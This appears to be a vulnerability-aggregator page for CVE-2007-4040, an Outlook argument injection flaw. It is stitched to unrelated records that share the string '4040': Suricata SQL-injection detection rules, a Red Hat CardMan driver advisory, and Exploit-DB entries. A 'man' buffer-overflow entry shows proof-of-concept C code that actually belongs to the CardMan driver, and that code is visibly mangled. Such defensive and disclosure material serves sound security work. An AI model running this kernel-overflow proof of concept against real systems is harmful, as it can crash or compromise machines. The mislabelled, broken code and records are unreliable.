CVE-2007-4040
published 2007-07-27CVE-2007-4040: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct…
PriorityP339high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EPSS
13.47%
96.0th percentile
Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat6.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4040 [MEDIUM] CWE-79 GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
Red Hat
security flaw
vendor_redhat·2007-03-06·CVSS 6.9
CVE-2007-0005 [MEDIUM] security flaw
security flaw
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004643; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004646; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Init
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004642; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_ta
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004641; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004645; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004644; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Exploit-DB
Man Command - -H Flag Local Buffer Overflow
exploitdb·2007-04-06·CVSS 6.9
CVE-2006-4250 [MEDIUM] Man Command - -H Flag Local Buffer Overflow
Man Command - -H Flag Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/23355/info
The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.
Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
PoC Code:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerla
Exploit-DB
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
exploitdb·2007-03-09·CVSS 6.9
CVE-2007-0005 [MEDIUM] Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
---
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/
#include
#include
#include
#include
#include
#include
#include
int main(int argc, char *argv[]) {
int fd, i, n;
char buf[8192];
/*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
*/
for (i = 0; i > 8);
buf[i+1] = (char) ((i/2) & 0x00FF);
}
if ((fd = open("/dev/cmx0", O_RDWR)) %s\n", strerror(errno));
exit(errno);
}
if ((n = write(fd, buf, sizeof(buf))) %s\n", strerror(errno));
exit(errno);
}
printf("%d of %d bytes written\n", n, sizeof(buf));
exit(0);
}
2007-07-27
Published